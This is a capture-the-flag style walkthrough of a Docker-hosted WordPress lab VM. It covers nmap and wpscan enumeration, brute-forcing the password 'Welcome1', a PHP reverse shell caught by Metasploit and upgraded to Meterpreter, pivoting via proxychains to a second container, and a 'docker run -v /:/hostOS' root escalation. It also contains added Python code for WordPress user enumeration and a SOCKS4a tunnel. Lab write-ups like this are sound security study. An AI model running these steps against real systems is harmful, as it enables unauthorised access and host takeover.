Enumeration





┌─[user@parrot]─[~/Desktop]
└──╼ $nmap -sV -sC -A -p- -T5 192.168.1.2
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-16 17:06 +03
Nmap scan report for 192.168.1.2
Host is up (0.0022s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
|   2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
|   256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
|_  256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
2375/tcp open  docker  Docker 17.06.0-ce
| docker-version:
|   KernelVersion: 3.13.0-128-generic
|   MinAPIVersion: 1.12
|   Arch: amd64
|   GoVersion: go1.8.3
|   ApiVersion: 1.30
|   Version: 17.06.0-ce
|   Os: linux
|   BuildTime: 2017-06-23T21:17:13.228983331+00:00
|_  GitCommit: 02c1d87
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Content-Type: application/json
|     Date: Sat, 16 Feb 2019 14:07:30 GMT
|     Content-Length: 29
|     {"message":"page not found"}
|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 404 Not Found
|     Content-Type: application/json
|     Date: Sat, 16 Feb 2019 14:07:05 GMT
|     Content-Length: 29
|     {"message":"page not found"}
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Api-Version: 1.30
|     Docker-Experimental: false
|     Ostype: linux
|     Server: Docker/17.06.0-ce (linux)
|     Date: Sat, 16 Feb 2019 14:07:05 GMT
|     Content-Length: 0
|     Content-Type: text/plain; charset=utf-8
|   docker:
|     HTTP/1.1 400 Bad Request: missing required Host header
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request: missing required Host header
8000/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.8
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: NotSoEasy Docker – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



$wpscan --url http://192.168.1.2:8000 --enumerate
[+] bob
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.1.2:8000/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
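Two of the confirmations wpscan lists are worth understanding on their own, because they are what you would check by hand without the tool: the REST users endpoint (/wp-json/wp/v2/users) returns every author as JSON, and the RSS feed leaks each post's author in dc:creator plus the WordPress version in the generator tag. The following is an added example, not code from the write-up or from wpscan; it re-implements those two checks. The JSON and RSS bodies are constructed samples so it runs offline, and it assumes both endpoints are reachable without authentication, as they were here.

```python
"""Added example, not the author's code: re-implement the two user-enumeration
checks that wpscan reports above (Wp Json Api and Rss Generator) so the finding
can be confirmed without the tool.
Assumptions: the REST users endpoint and the /feed/ RSS are reachable
unauthenticated; the two sample responses below are constructed, not captured."""
import json
import re
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample of GET /wp-json/wp/v2/users/?per_page=100&page=1
SAMPLE_WP_JSON = json.dumps([
    {"id": 1, "name": "bob", "slug": "bob", "link": "http://192.168.1.2:8000/?author=1"},
]).encode()

# Constructed sample of GET /feed/, trimmed to the elements that leak information
SAMPLE_RSS = b"""<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title>NotSoEasy Docker</title>
<generator>https://wordpress.org/?v=4.8.8</generator>
<item><title>Hello world!</title><dc:creator><![CDATA[bob]]></dc:creator></item>
</channel>
</rss>"""

DC = "{http://purl.org/dc/elements/1.1/}"


def users_from_wp_json(body):
    """The 'slug' is user_nicename, which WordPress derives from the login name;
    it is the value wpscan later feeds into its password attack."""
    return [(u["id"], u["slug"]) for u in json.loads(body)]


def authors_from_rss(body):
    """dc:creator in each feed item is the author's display name, usually the login."""
    root = ET.fromstring(body)
    return sorted({el.text.strip() for el in root.iter(DC + "creator") if el.text})


def wp_version_from_rss(body):
    """The generator tag carries the core version (4.8.8 in the scan above)."""
    gen = ET.fromstring(body).findtext("channel/generator") or ""
    m = re.search(r"\?v=([\d.]+)", gen)
    return m.group(1) if m else None


def fetch(url, timeout=10):
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def enumerate_users(base_url):
    """Live version: page through the REST endpoint (100 per page) and merge the
    result with the RSS authors. Returns a sorted list of candidate login names."""
    names = set(authors_from_rss(fetch(base_url + "/feed/")))
    page = 1
    while True:
        body = fetch(f"{base_url}/wp-json/wp/v2/users/?per_page=100&page={page}")
        batch = users_from_wp_json(body)
        names.update(slug for _, slug in batch)
        if len(batch) < 100:  # last page reached
            break
        page += 1
    return sorted(names)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(enumerate_users(sys.argv[1].rstrip("/")))
    else:
        print(users_from_wp_json(SAMPLE_WP_JSON),
              authors_from_rss(SAMPLE_RSS),
              wp_version_from_rss(SAMPLE_RSS))
```

Run it as `python3 wpusers.py http://192.168.1.2:8000` to get the candidate list; with no argument it parses the embedded samples.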





$wpscan --url http://192.168.1.2:8000 -P /usr/share/wordlists/rockyou.txt --usernames bob --password-attack wp-login
----------------------------------------
[i] Valid Combinations Found:
 | Username: bob, Password: Welcome1
-----------------------------------------





Gaining Access





msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php







msf exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf post(multi/manage/shell_to_meterpreter) > run

[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.1.11:4433
[*] Sending stage (861480 bytes) to 192.168.1.12
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...

meterpreter >







meterpreter > ifconfig
Interface  7
============
Name         : eth0
Hardware MAC : 02:42:ac:12:00:03
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 172.18.0.3
IPv4 Netmask : 255.255.0.0







msf post(multi/manage/shell_to_meterpreter) > route add 172.18.0.0 255.255.255.0 4
[*] Route added
msf post(multi/manage/shell_to_meterpreter) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   172.18.0.0         255.255.255.0      Session 4

[*] There are currently no IPv6 routes defined.







┌─[✗]─[root@parrot]─[/home/user]
└──╼ #proxychains ssh 172.18.0.4
ProxyChains-3.1 (http://proxychains.sf.net)
|D-chain|-<>-127.0.0.1:1080-<><>-172.18.0.4:22-<><>-OK
/ $ ls
bin   dev                         entrypoint.sh  home  lib64  mnt  proc  run   srv  tmp  var
boot  docker-entrypoint-initdb.d  etc            lib   media  opt  root  sbin  sys  usr
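The `|D-chain|-<>-127.0.0.1:1080-<><>-172.18.0.4:22-<><>-OK` line is proxychains reporting a successful SOCKS CONNECT: it opened a TCP connection to the Metasploit listener on 127.0.0.1:1080, asked it to connect to 172.18.0.4:22 on its behalf, and the listener, whose traffic is routed through the Meterpreter session, said yes. The block below is an added example, not from the write-up, that performs that exchange by hand so the handshake is visible. It assumes the listener speaks SOCKS4a (the write-up does not name the Metasploit module; a SOCKS5 listener would need a different handshake and this code fails on the version byte), and the proxy address and target are the ones from the transcript.

```python
"""Added example (not from the write-up): the SOCKS4a CONNECT exchange that
proxychains performs with 127.0.0.1:1080 before 'ssh 172.18.0.4' above, written
out so the 'D-chain ... OK' line has a concrete meaning.
Assumption: the proxy Metasploit serves is SOCKS4a (the write-up does not name
the module); a SOCKS5 listener would need a different handshake."""
import socket
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 1
GRANTED, REJECTED, NO_IDENTD, IDENTD_MISMATCH = 0x5A, 0x5B, 0x5C, 0x5D


def socks4a_connect_request(host, port, userid=b""):
    """Client -> proxy. A dotted quad goes in DSTIP; a hostname uses the 4a
    extension (DSTIP 0.0.0.1 plus the name after the user id) so the proxy,
    which sits behind the pivot, does the DNS lookup instead of the attacker."""
    try:
        dstip, tail = socket.inet_aton(host), b""
    except OSError:
        dstip, tail = b"\x00\x00\x00\x01", host.encode() + b"\x00"
    return struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, dstip) + userid + b"\x00" + tail


def parse_socks4_reply(data):
    """Proxy -> client: VN=0, CD=0x5A on success; DSTPORT/DSTIP are ignored.
    Returns (granted, code)."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply")
    vn, cd, _port, _ip = struct.unpack("!BBH4s", data[:8])
    if vn != 0:
        raise ValueError(f"unexpected reply version {vn}, not a SOCKS4 proxy?")
    return cd == GRANTED, cd


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection mid-handshake")
        buf += chunk
    return buf


def connect_via_socks4a(proxy, dst_host, dst_port, timeout=10):
    """Open a TCP tunnel to dst through the proxy; the returned socket talks to dst."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(socks4a_connect_request(dst_host, dst_port))
    ok, code = parse_socks4_reply(recv_exact(s, 8))
    if not ok:
        s.close()
        raise ConnectionError(f"proxy refused CONNECT, code 0x{code:02x}")
    return s


if __name__ == "__main__":
    tunnel = connect_via_socks4a(("127.0.0.1", 1080), "172.18.0.4", 22)
    print(tunnel.recv(64))  # the SSH banner of the second container, via the pivot
    tunnel.close()
```

Because the request carries the destination address and the proxy resolves and connects from inside the session, nothing on the attacker machine needs a route to 172.18.0.0/16; that is exactly why the Metasploit route plus a SOCKS listener is enough to reach the second container.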





Privilege Escalation





$docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
You should now have a root shell on the host OS
Press Ctrl-D to exit the docker instance / shell
# whoami
root





There are two levels in this VM, easy and hard. I'll start with the easy one.

Firstly, I'm curious about the nmap scan, so I'll go with nmap. Let's look at the web page on port 8000. Now we know this is WordPress and it is probably running as a container: the scan shows the Docker daemon's API on port 2375, and the SSH banner says Ubuntu while the Apache banner says Debian, which is what you see when each service runs from its own image. I'll focus on the WordPress part for now.

Let's look at the wpscan output. wpscan detected a user enumeration weakness and found the user bob. Time to brute force the admin panel with the user bob.

I uploaded a reverse shell in one of the pages. Now you have two options: you can catch the reverse shell with nc or a similar tool, or with msfconsole. I chose msfconsole because I'll use some Metasploit modules and Meterpreter features. Set the options, run, and get access.

Now we are in the container. I wanted to upgrade the shell to Meterpreter, so I used the post module shown in the transcript above.

I tried a lot of kernel exploits and failed, so I decided to choose my attack vector. Think about it: you are in the container, and we may not be alone. I tried to find other friends on the host. I gained access to 172.18.0.3 and had to find other IPs alive on this interface (172.18.0.*). I can't reach other IPs on this interface from my attacker machine, so I had to set up a proxy through this machine (pivoting). First, I set up the route table. (The container interface has a 255.255.0.0 netmask while the route was added with 255.255.255.0; that still covers 172.18.0.1 to 172.18.0.254, which is the range scanned here.)

I ran the [...] module to prepare the proxy. Then I went to [...] and added [...] at the end of the file. Now every command that I run through proxychains works as if it ran from the container. That is the basic proxy principle; if you don't understand it completely, you can search the proxy concept on the web. Now we can scan the network 172.18.0.*.

After the nmap scan, I realized that port 22 of 172.18.0.4 is open. Now I'm in the second container on the host, because ssh didn't ask for a password.

After some time, I realized [...] is visible on the system. After some research, I found a way to reach the host machine on this blog. If you want to learn more about this way, I strongly recommend taking a look at that blog post. The command bind-mounts the host's root filesystem into a fresh container (-v /:/hostOS) and the image chroots into that mount and hands you a root shell, so anyone who can run docker here is effectively root on the host.